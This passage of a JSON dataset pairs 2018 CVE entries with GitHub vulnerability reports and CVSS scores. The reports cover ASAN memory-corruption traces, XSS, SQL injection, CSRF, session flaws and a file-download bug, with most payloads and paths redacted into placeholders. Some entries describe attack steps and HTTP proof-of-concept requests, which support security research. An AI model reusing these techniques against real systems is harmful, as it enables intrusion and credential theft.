  19533. "Issue_Created_At": "2018-04-16T12:39:10Z",
  19534. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19535. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19536. "severity": "MEDIUM",
  19537. "baseScore": 5.5,
  19538. "impactScore": 3.6,
  19539. "exploitabilityScore": 1.8
  19540. },
  19541. {
  19542. "CVE_ID": "CVE-2018-11403",
  19543. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/63",
  19544. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/63",
  19545. "Repo_new": "domainmod/domainmod",
  19546. "Issue_Created_At": "2018-05-23T12:35:54Z",
  19547. "description": "There is two cross site scripting vulnerability. Two xss vulnerability was discovered in domainmod NUMBERTAG There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML NUMBERTAG URLTAG NUMBERTAG URLTAG",
  19548. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  19549. "severity": "MEDIUM",
  19550. "baseScore": 5.4,
  19551. "impactScore": 2.7,
  19552. "exploitabilityScore": 2.3
  19553. },
  19554. {
  19555. "CVE_ID": "CVE-2018-11413",
  19556. "Issue_Url_old": "https://github.com/yupoxiong/BearAdmin/issues/5",
  19557. "Issue_Url_new": "https://github.com/yupoxiong/bearadmin/issues/5",
  19558. "Repo_new": "yupoxiong/bearadmin",
  19559. "Issue_Created_At": "2018-05-24T13:00:27Z",
  19560. "description": "There is two vulnerability SQL INJECTION AND AN DOWNLOAD FILES WITHOUT LIMIT. FILETAG INJECTION In the controller file PATHTAG in the function index code line NUMBERTAG CODETAG the parameter named user_id without any APITAG just bring into the MYSQL query. After use the demo account demo demo login in your app, and then using the payload PATHTAG APITAG we can get the version of your MYSQL . that's the testing on your demo website. FILETAG NUMBERTAG download files without any limit in the file PATHTAG In the function __construct ,line NUMBERTAG ERRORTAG from the code we know that the parameter \"name \" is from the GET method.and without any limit let's take a look at the code line NUMBERTAG ERRORTAG $this >back is defined in the file PATHTAG line NUMBERTAG ERRORTAG the dowloadfile function haven't any filters. So i deploy the apps on local,after login we try the poc url PATHTAG FILETAG We can read the config file of mysql account and the password",
  19561. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  19562. "severity": "MEDIUM",
  19563. "baseScore": 6.5,
  19564. "impactScore": 3.6,
  19565. "exploitabilityScore": 2.8
  19566. },
  19567. {
  19568. "CVE_ID": "CVE-2018-11416",
  19569. "Issue_Url_old": "https://github.com/tjko/jpegoptim/issues/57",
  19570. "Issue_Url_new": "https://github.com/tjko/jpegoptim/issues/57",
  19571. "Repo_new": "tjko/jpegoptim",
  19572. "Issue_Created_At": "2018-04-17T01:52:30Z",
  19573. "description": "Double free in jpegoptim. I have come across a double free in jpegoptim. Please see the ASAN report below. The crash file test case can be found FILETAG . This was found in commit APITAG The command to compile the binary is as follows: ERRORTAG This double free could be used to assist in exploiting the software via heap manipulation resulting in code execution. ERRORTAG",
  19574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19575. "severity": "HIGH",
  19576. "baseScore": 8.8,
  19577. "impactScore": 5.9,
  19578. "exploitabilityScore": 2.8
  19579. },
  19580. {
  19581. "CVE_ID": "CVE-2018-11418",
  19582. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2237",
  19583. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2237",
  19584. "Repo_new": "jerryscript-project/jerryscript",
  19585. "Issue_Created_At": "2018-03-08T07:44:13Z",
  19586. "description": "heap buffer overflow in lit_read_code_unit_from_utf8. (new APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG f at pc NUMBERTAG ff NUMBERTAG bp NUMBERTAG ffe3dc NUMBERTAG sp NUMBERTAG ffe3dc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG f thread T NUMBERTAG ff NUMBERTAG in lit_read_code_unit_from_utf8 PATHTAG NUMBERTAG ff NUMBERTAG in lit_utf8_peek_next PATHTAG NUMBERTAG e0c0 in re_parse_char_class PATHTAG NUMBERTAG a7b5 in re_parse_alternative PATHTAG NUMBERTAG b5f7 in re_compile_bytecode PATHTAG NUMBERTAG e NUMBERTAG in ecma_op_create_regexp_object PATHTAG NUMBERTAG bf NUMBERTAG b in APITAG PATHTAG NUMBERTAG a0e9d in APITAG PATHTAG NUMBERTAG b3 in opfunc_construct PATHTAG NUMBERTAG b3 in vm_execute PATHTAG NUMBERTAG a0d in vm_run PATHTAG NUMBERTAG a0d in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ea NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG f8e9 ( PATHTAG NUMBERTAG f NUMBERTAG f is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG f) allocated by thread T0 here NUMBERTAG f7a1edee in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_alloc_block PATHTAG NUMBERTAG aa in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG a in parser_compute_indicies PATHTAG NUMBERTAG a in parser_post_processing PATHTAG NUMBERTAG f8a in parser_parse_source PATHTAG NUMBERTAG c NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ea NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_utf8 Shadow bytes around the buggy address NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG ec NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  19587. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19588. "severity": "CRITICAL",
  19589. "baseScore": 9.8,
  19590. "impactScore": 5.9,
  19591. "exploitabilityScore": 3.9
  19592. },
  19593. {
  19594. "CVE_ID": "CVE-2018-11419",
  19595. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2230",
  19596. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2230",
  19597. "Repo_new": "jerryscript-project/jerryscript",
  19598. "Issue_Created_At": "2018-03-01T06:28:57Z",
  19599. "description": "heap buffer overflow in lit_read_code_unit_from_hex. samiliar bug with NUMBERTAG new APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG c at pc NUMBERTAG f9f5a bp NUMBERTAG ffdf2a NUMBERTAG sp NUMBERTAG ffdf2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG c thread T NUMBERTAG f9f NUMBERTAG in lit_read_code_unit_from_hex PATHTAG NUMBERTAG df NUMBERTAG in re_parse_char_class PATHTAG NUMBERTAG a7b5 in re_parse_alternative PATHTAG NUMBERTAG b5f7 in re_compile_bytecode PATHTAG NUMBERTAG e NUMBERTAG in ecma_op_create_regexp_object PATHTAG NUMBERTAG bf NUMBERTAG b in APITAG PATHTAG NUMBERTAG a0e9d in APITAG PATHTAG NUMBERTAG b3 in opfunc_construct PATHTAG NUMBERTAG b3 in vm_execute PATHTAG NUMBERTAG a0d in vm_run PATHTAG NUMBERTAG a0d in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG f8e9 ( PATHTAG NUMBERTAG f NUMBERTAG c is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG c) allocated by thread T0 here NUMBERTAG f NUMBERTAG dee in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_alloc_block PATHTAG NUMBERTAG aa in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG a in parser_compute_indicies PATHTAG NUMBERTAG a in parser_post_processing PATHTAG NUMBERTAG f8a in parser_parse_source PATHTAG NUMBERTAG c NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_hex Shadow bytes around the buggy address NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG eb NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  19600. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19601. "severity": "CRITICAL",
  19602. "baseScore": 9.8,
  19603. "impactScore": 5.9,
  19604. "exploitabilityScore": 3.9
  19605. },
  19606. {
  19607. "CVE_ID": "CVE-2018-11440",
  19608. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/575",
  19609. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/575",
  19610. "Repo_new": "liblouis/liblouis",
  19611. "Issue_Created_At": "2018-05-25T10:12:07Z",
  19612. "description": "ASAn stack based buffer overflow in APITAG APITAG FILETAG Tested version NUMBERTAG and commit APITAG Might be related to: CVETAG Credit: Henri Salo ERRORTAG",
  19613. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19614. "severity": "HIGH",
  19615. "baseScore": 8.8,
  19616. "impactScore": 5.9,
  19617. "exploitabilityScore": 2.8
  19618. },
  19619. {
  19620. "CVE_ID": "CVE-2018-11468",
  19621. "Issue_Url_old": "https://github.com/Orc/discount/issues/189",
  19622. "Issue_Url_new": "https://github.com/orc/discount/issues/189",
  19623. "Repo_new": "orc/discount",
  19624. "Issue_Created_At": "2018-05-23T09:44:58Z",
  19625. "description": "Several heap buffer overflow issues have been found.. A buffer overflow has been discovered. The information is displayed as follows: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG a NUMBERTAG a at pc NUMBERTAG f7e7a5e7df8 bp NUMBERTAG ffe NUMBERTAG efa NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ef1f8 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG a NUMBERTAG a thread T NUMBERTAG f7e7a5e7df7 in __asan_memmove ( PATHTAG NUMBERTAG b NUMBERTAG in memmove PATHTAG NUMBERTAG b NUMBERTAG in __mkd_trim_line PATHTAG NUMBERTAG e0 in codeblock PATHTAG NUMBERTAG e0 in compile PATHTAG NUMBERTAG a NUMBERTAG e in compile_document PATHTAG NUMBERTAG a NUMBERTAG e in mkd_compile PATHTAG NUMBERTAG c in main PATHTAG NUMBERTAG f7e7a1b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f7e7a5f NUMBERTAG in malloc ( PATHTAG NUMBERTAG e NUMBERTAG d in splitline PATHTAG NUMBERTAG e NUMBERTAG d in htmlblock PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memmove Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The input test case is at: URLTAG The executable file is mkd2html.",
  19626. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19627. "severity": "MEDIUM",
  19628. "baseScore": 5.5,
  19629. "impactScore": 3.6,
  19630. "exploitabilityScore": 1.8
  19631. },
  19632. {
  19633. "CVE_ID": "CVE-2018-11472",
  19634. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/445",
  19635. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/445",
  19636. "Repo_new": "monstra-cms/monstra",
  19637. "Issue_Created_At": "2018-05-22T19:58:56Z",
  19638. "description": "Reflected XSS in Login. Reflected XSS in Login Below is the post request and the screenshot attached POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG login=\"> APITAG APITAG FILETAG FILETAG",
  19639. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19640. "severity": "MEDIUM",
  19641. "baseScore": 6.1,
  19642. "impactScore": 2.7,
  19643. "exploitabilityScore": 2.8
  19644. },
  19645. {
  19646. "CVE_ID": "CVE-2018-11473",
  19647. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/446",
  19648. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/446",
  19649. "Repo_new": "monstra-cms/monstra",
  19650. "Issue_Created_At": "2018-05-22T20:21:21Z",
  19651. "description": "XSS in registration Form. XSS in registration Form Below is the post request that is causing the pop up..here all the fields are vulnerable POST PATHTAG HTTP NUMBERTAG Host: localhost Cache Control: no cache Referer: URLTAG Accept: PATHTAG / ;q NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept Language: en us,en;q NUMBERTAG Cookie: PHPSESSID=xxxx; login_attempts=i NUMBERTAG A NUMBERTAG B Accept Encoding: gzip, deflate Content Length NUMBERTAG Content Type: application/x www form urlencoded APITAG APITAG APITAG",
  19652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19653. "severity": "MEDIUM",
  19654. "baseScore": 6.1,
  19655. "impactScore": 2.7,
  19656. "exploitabilityScore": 2.8
  19657. },
  19658. {
  19659. "CVE_ID": "CVE-2018-11474",
  19660. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/444",
  19661. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/444",
  19662. "Repo_new": "monstra-cms/monstra",
  19663. "Issue_Created_At": "2018-05-22T19:38:13Z",
  19664. "description": "Session Management Issue in Administrations Tab. Session Management Issue in Administrations Tab link: URLTAG You need two browsers for exploitation NUMBERTAG Go to users settings in both the browsers NUMBERTAG update your password in one browser and click on save APITAG move to other browser and try to add some information like name and all. i.e it is not asking for reauthentication after password change.. The other browser doesnt log you out because of password APITAG an attacker can edit any information... If an attacker had already logged in once..No matter how many times the victim changes his password, the attacker would be able to access the victim's account. Refer to owasp for session management",
  19665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  19666. "severity": "HIGH",
  19667. "baseScore": 8.0,
  19668. "impactScore": 5.9,
  19669. "exploitabilityScore": 2.1
  19670. },
  19671. {
  19672. "CVE_ID": "CVE-2018-11475",
  19673. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/443",
  19674. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/443",
  19675. "Repo_new": "monstra-cms/monstra",
  19676. "Issue_Created_At": "2018-05-22T19:37:16Z",
  19677. "description": "Session Management in users. Session Management Issue in Users tab link: URLTAG You need two browsers for exploitation NUMBERTAG Go to users settings in both the browsers NUMBERTAG update your password in one browser and click on save APITAG move to other browser and try to add some information like name and all. i.e it is not asking for reauthentication after password change.. The other browser doesnt log you out because of password APITAG an attacker can edit any information... If an attacker had already logged in once..No matter how many times the victim changes his password, the attacker would be able to access the victim's account. Refer to owasp for session management",
  19678. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  19679. "severity": "HIGH",
  19680. "baseScore": 8.0,
  19681. "impactScore": 5.9,
  19682. "exploitabilityScore": 2.1
  19683. },
  19684. {
  19685. "CVE_ID": "CVE-2018-11487",
  19686. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/2",
  19687. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/2",
  19688. "Repo_new": "gaozhifeng/phpmywind",
  19689. "Issue_Created_At": "2018-05-25T07:53:39Z",
  19690. "description": "page.php maybe has some vul. When I visit the next three url, the source code of the page will be injected my code at the location of page number area. URLTAG APITAG FILETAG APITAG FILETAG APITAG Then, you can use browser check the source code cf the page, you will find the payload code in the code where is page number area. The vul coursed by the \"$nowurl\" in APITAG",
  19691. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19692. "severity": "MEDIUM",
  19693. "baseScore": 6.1,
  19694. "impactScore": 2.7,
  19695. "exploitabilityScore": 2.8
  19696. },
  19697. {
  19698. "CVE_ID": "CVE-2018-11490",
  19699. "Issue_Url_old": "https://github.com/pts/sam2p/issues/38",
  19700. "Issue_Url_new": "https://github.com/pts/sam2p/issues/38",
  19701. "Repo_new": "pts/sam2p",
  19702. "Issue_Created_At": "2018-05-24T02:27:21Z",
  19703. "description": "Heap Buffer Overflow NUMBERTAG in function APITAG in cgif.c. Here is the bug NUMBERTAG if APITAG != NO_SUCH_CODE NUMBERTAG APITAG APITAG NUMBERTAG APITAG the APITAG APITAG NUMBERTAG should be checked if it is less than LZ_MAX_CODE. The crash is as follows: (gdb) run crash NUMBERTAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG aa in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG (gdb) bt NUMBERTAG aa in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG eb in APITAG APITAG Line=<optimized out>, APITAG out>) at APITAG NUMBERTAG ba in APITAG APITAG at APITAG NUMBERTAG d in in_gif_reader (ufd=<optimized out>) at APITAG NUMBERTAG fca8 in Image::load (ufd NUMBERTAG a NUMBERTAG APITAG format=format APITAG at APITAG NUMBERTAG eb0 in run_sam2p_engine (sout=..., serr=..., arg NUMBERTAG optimized out>, helpp=helpp APITAG at APITAG NUMBERTAG d0 in main (arg NUMBERTAG fffffffe5c8) at APITAG (gdb) p Private APITAG NUMBERTAG gdb)",
  19704. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19705. "severity": "HIGH",
  19706. "baseScore": 8.8,
  19707. "impactScore": 5.9,
  19708. "exploitabilityScore": 2.8
  19709. },
  19710. {
  19711. "CVE_ID": "CVE-2018-11493",
  19712. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/137",
  19713. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/137",
  19714. "Repo_new": "wuzhicms/wuzhicms",
  19715. "Issue_Created_At": "2018-05-23T09:26:58Z",
  19716. "description": "There is a CSRF vulnerability that can add links to friendship. After the administrator logs in, open this page poc FILETAG APITAG a friendship link ERRORTAG",
  19717. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19718. "severity": "HIGH",
  19719. "baseScore": 8.8,
  19720. "impactScore": 5.9,
  19721. "exploitabilityScore": 2.8
  19722. },
  19723. {
  19724. "CVE_ID": "CVE-2018-11496",
  19725. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/96",
  19726. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/96",
  19727. "Repo_new": "ckolivas/lrzip",
  19728. "Issue_Created_At": "2018-05-25T01:57:28Z",
  19729. "description": "heap use after free in read_stream APITAG In the latest commit master ed NUMBERTAG e1 URLTAG , there is a heap use after free in read_stream function APITAG With ASAN cflags \" fsanitize=address\", use the POC attached will trigger the vulnerability. Command to reproduce: APITAG The ASAN backtrace info: ERRORTAG when compile without ASAN flags, lrzip will crash because of double free ERRORTAG APITAG was freed in APITAG in APITAG CODETAG in the below code, the APITAG may be freed in APITAG , but with while the s >buf will be used again in memcpy in line NUMBERTAG and may be free again in fill_buffer in NUMBERTAG which caused heap use after free and double free. ERRORTAG FILETAG",
  19730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19731. "severity": "MEDIUM",
  19732. "baseScore": 6.5,
  19733. "impactScore": 3.6,
  19734. "exploitabilityScore": 2.8
  19735. },
  19736. {
  19737. "CVE_ID": "CVE-2018-11498",
  19738. "Issue_Url_old": "https://github.com/inikep/lizard/issues/16",
  19739. "Issue_Url_new": "https://github.com/inikep/lizard/issues/16",
  19740. "Repo_new": "inikep/lizard",
  19741. "Issue_Created_At": "2018-05-03T02:10:03Z",
  19742. "description": "Negative size passed to memcpy resulting in memory corruption APITAG Hey there, I have come across a vulnerability in the lizard decompressor, whereby a negative size integer is passed to APITAG . This occurs in APITAG URLTAG . APITAG Since APITAG takes the length and treats it as a APITAG , this results in an excessive copy from APITAG into op . APITAG This was found while fuzzing commit APITAG (current latest as of this date). By controlling the number of bytes passed as length , this results in memory corruption which leads to execution control. Find the POC file here: FILETAG . As follows is the ASAN output: ERRORTAG",
  19743. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19744. "severity": "HIGH",
  19745. "baseScore": 7.8,
  19746. "impactScore": 5.9,
  19747. "exploitabilityScore": 1.8
  19748. },
  19749. {
  19750. "CVE_ID": "CVE-2018-11500",
  19751. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/11",
  19752. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/11",
  19753. "Repo_new": "sanluan/publiccms",
  19754. "Issue_Created_At": "2018-05-25T04:04:42Z",
  19755. "description": "There is a CSRF vulnerability that can add the administrator account. The Add administrator Function is not check referer and token POC: ERRORTAG Building a page and inducing administrator access can add a user with super privileges.",
  19756. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19757. "severity": "HIGH",
  19758. "baseScore": 8.8,
  19759. "impactScore": 5.9,
  19760. "exploitabilityScore": 2.8
  19761. },
  19762. {
  19763. "CVE_ID": "CVE-2018-11507",
  19764. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/509",
  19765. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/509",
  19766. "Repo_new": "flif-hub/flif",
  19767. "Issue_Created_At": "2018-05-27T17:18:15Z",
  19768. "description": "CVETAG resource exhaustion. FLIF uses huge amount of CPU and memory in function image_load_pnm at image/image APITAG when processing following file: FILETAG FILETAG",
  19769. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19770. "severity": "MEDIUM",
  19771. "baseScore": 6.5,
  19772. "impactScore": 3.6,
  19773. "exploitabilityScore": 2.8
  19774. },
  19775. {
  19776. "CVE_ID": "CVE-2018-11515",
  19777. "Issue_Url_old": "https://github.com/DediData/wpforo/issues/1",
  19778. "Issue_Url_new": "https://github.com/dedidata/wpforo/issues/1",
  19779. "Repo_new": "DediData/wpforo",
  19780. "Issue_Created_At": "2018-05-27T12:40:35Z",
  19781. "description": "Sql injection directly get the administrator account and password. No login APITAG is sql injection on the search\u3002 poc: APITAG APITAG posts HTTP NUMBERTAG Host: gvectors.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG _gat NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG",
  19782. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19783. "severity": "CRITICAL",
  19784. "baseScore": 9.8,
  19785. "impactScore": 5.9,
  19786. "exploitabilityScore": 3.9
  19787. },
  19788. {
  19789. "CVE_ID": "CVE-2018-11522",
